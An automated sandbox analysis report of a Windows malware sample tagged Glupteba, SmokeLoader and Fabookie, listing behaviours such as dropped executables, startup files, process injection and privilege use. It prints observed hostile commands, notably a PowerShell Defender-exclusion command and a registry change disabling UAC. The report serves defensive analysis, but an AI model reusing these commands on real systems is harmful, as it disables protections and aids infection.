Malware Analysis Report

2025-01-02 09:18

Sample ID 231006-hb3xzsbf45
Target 9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1
SHA256 9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1
Tags
upx fabookie glupteba smokeloader pub1 backdoor discovery dropper evasion loader spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1

Threat Level: Known bad

The file 9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1 was found to be: Known bad.

Malicious Activity Summary

Glupteba payload

Glupteba

Detect Fabookie payload

SmokeLoader

Fabookie

UAC bypass

Downloads MZ/PE file

Stops running service(s)

Loads dropped DLL

UPX packed file

Themida packer

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Looks up external IP address via web service

Checks installed software on the system

Checks whether UAC is enabled

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Runs net.exe

System policy modification

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-06 06:34

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-06 06:34

Reported

2023-10-06 06:37

Platform

win10-20230915-en

Max time kernel

17s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe N/A

Downloads MZ/PE file

Stops running service(s)

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eCI4ZbiIpn5VOdsGVJSM0wpf.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbmcKfXQ2NbsVXHwNlDv1fJJ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdVWpjCCJkGNnOeWusV6cqkC.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mNecwJ4k4SKcZG0JiWQXIWDO.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CmovzbGk0GmUdOkxd9Kf1HrH.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cPyjXow5GhJ3MpUT5ZNQ0x94.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\27fWKlRgGQLhrkeHLFBrv8bi.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lWFKf1hy3BS7hwTi1rvRBt6h.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UcOk4WCAlSlS2nsRjifsPMKF.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ELfULpLWlcR8PxM1GzGn7SeA.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vg91iSKtnzH3riPPDtdt0YKL.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SG112RvS1FqKPmOZHWQW4SsE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe N/A
N/A N/A C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe N/A
N/A N/A C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
N/A N/A C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe N/A
N/A N/A C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe N/A
N/A N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
N/A N/A C:\Users\Admin\Pictures\cyyky2Es1gtRl2hQuenXn5si.exe N/A
N/A N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
N/A N/A C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-25HDM.tmp\98JN9KmVPfWhTtr0EFitFYHD.tmp N/A
N/A N/A C:\Program Files (x86)\OSNMount\OSNMount.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp N/A
N/A N/A C:\Users\Admin\Pictures\7Y6Mk73rBSOq4GYoZJ1pwpg0.exe N/A
N/A N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
N/A N/A C:\Program Files (x86)\OSNMount\OSNMount.exe N/A
N/A N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
N/A N/A C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe N/A
N/A N/A C:\Users\Admin\Pictures\54hLtST1w78WuT9Iw4O0oErf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TPBS9.tmp\_isetup\_setup64.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4480 set thread context of 2952 N/A C:\Windows\system32\schtasks.exe C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\OSNMount\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File created C:\Program Files (x86)\OSNMount\is-2OTBQ.tmp C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File created C:\Program Files (x86)\OSNMount\is-VN75V.tmp C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File created C:\Program Files (x86)\OSNMount\is-84DT2.tmp C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File created C:\Program Files (x86)\OSNMount\is-MF3LP.tmp C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File opened for modification C:\Program Files (x86)\OSNMount\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File created C:\Program Files (x86)\OSNMount\is-I2OSM.tmp C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File created C:\Program Files (x86)\OSNMount\is-GIF4Q.tmp C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File opened for modification C:\Program Files (x86)\OSNMount\OSNMount.exe C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3432 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3432 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3432 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4060 wrote to memory of 4480 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\system32\schtasks.exe
PID 4060 wrote to memory of 4480 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\system32\schtasks.exe
PID 4060 wrote to memory of 4480 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\system32\schtasks.exe
PID 4060 wrote to memory of 2348 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe
PID 4060 wrote to memory of 2348 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe
PID 4060 wrote to memory of 2348 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe
PID 4060 wrote to memory of 2004 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe
PID 4060 wrote to memory of 2004 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe
PID 4060 wrote to memory of 2004 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe
PID 4060 wrote to memory of 4916 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe
PID 4060 wrote to memory of 4916 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe
PID 4060 wrote to memory of 4916 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe
PID 2348 wrote to memory of 3880 N/A C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp
PID 2348 wrote to memory of 3880 N/A C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp
PID 2348 wrote to memory of 3880 N/A C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp
PID 4060 wrote to memory of 4316 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe
PID 4060 wrote to memory of 4316 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe
PID 4060 wrote to memory of 4316 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe
PID 4060 wrote to memory of 3852 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe
PID 4060 wrote to memory of 3852 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe
PID 4060 wrote to memory of 3852 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe
PID 4060 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 4060 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 4060 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 4060 wrote to memory of 4456 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\cyyky2Es1gtRl2hQuenXn5si.exe
PID 4060 wrote to memory of 4456 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\cyyky2Es1gtRl2hQuenXn5si.exe
PID 3800 wrote to memory of 2164 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 3800 wrote to memory of 2164 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 3800 wrote to memory of 2164 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 4060 wrote to memory of 3992 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe
PID 4060 wrote to memory of 3992 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe
PID 4060 wrote to memory of 3992 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe
PID 3852 wrote to memory of 4844 N/A C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe C:\Users\Admin\AppData\Local\Temp\is-25HDM.tmp\98JN9KmVPfWhTtr0EFitFYHD.tmp
PID 3852 wrote to memory of 4844 N/A C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe C:\Users\Admin\AppData\Local\Temp\is-25HDM.tmp\98JN9KmVPfWhTtr0EFitFYHD.tmp
PID 3852 wrote to memory of 4844 N/A C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe C:\Users\Admin\AppData\Local\Temp\is-25HDM.tmp\98JN9KmVPfWhTtr0EFitFYHD.tmp
PID 3880 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp C:\Windows\SysWOW64\net.exe
PID 3880 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp C:\Windows\SysWOW64\net.exe
PID 3880 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp C:\Windows\SysWOW64\net.exe
PID 3880 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp C:\Program Files (x86)\OSNMount\OSNMount.exe
PID 3880 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp C:\Program Files (x86)\OSNMount\OSNMount.exe
PID 3880 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp C:\Program Files (x86)\OSNMount\OSNMount.exe
PID 3800 wrote to memory of 936 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 3800 wrote to memory of 936 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 3800 wrote to memory of 936 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 3992 wrote to memory of 2412 N/A C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp
PID 3992 wrote to memory of 2412 N/A C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp
PID 3992 wrote to memory of 2412 N/A C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp
PID 4060 wrote to memory of 716 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\7Y6Mk73rBSOq4GYoZJ1pwpg0.exe
PID 4060 wrote to memory of 716 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\7Y6Mk73rBSOq4GYoZJ1pwpg0.exe
PID 3800 wrote to memory of 2228 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 3800 wrote to memory of 2228 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe

"C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe

"C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe"

C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe

"C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe"

C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe

"C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe"

C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp

